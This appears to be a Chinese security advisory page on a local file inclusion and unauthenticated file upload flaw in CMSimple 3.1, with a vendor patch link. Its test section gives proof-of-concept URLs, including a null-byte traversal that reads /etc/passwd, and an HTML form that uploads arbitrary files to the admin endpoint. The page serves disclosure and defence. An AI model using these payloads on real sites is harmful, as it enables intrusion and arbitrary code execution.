安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
CMSimple文件上传及本地文件包含漏洞及
发布日期:
2008-05-31
更新日期:
2008-06-03
受影响系统:
CMSimple CMSimple 3.1
描述:
BUGTRAQ ID:
29450
CMSimple是基于PHP的小型网站内容管理工具。
CMSimple的index.php脚本中没有正确地过滤对sl参数的输入便用于包含本地文件;index.php脚本没有正确地限制对登录用户的访问,可能导致上传任意文件并执行任意PHP代码。成功利用这些漏洞要求打开了register_globals。
<*来源:irk4z (
irk4z@yahoo.pl
)
链接:
http://secunia.com/advisories/30463/
http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17&start=0&st=0&sk=t&sd=a&sid=81903bc72653d1fceed6b162d4eb4e5b&view=print
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[host]/[path]/index.php?sl=[file]%00
http://[host]/[path]/index.php?sl=../../../../../../../etc/passwd%00
</pre>
<form method="POST" enctype="multipart/form-data" action="http://[host]/[path]/index.php?sl=../adm&adm=1" >
<input type="file" class="file" name="downloads" size="30">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="function" value="downloads">
<input type="submit" class="submit" value="Upload">
</form>
建议:
厂商补丁:
CMSimple
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.cmsimple.org/?Downloads:Security_fix
浏览次数:
2558
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客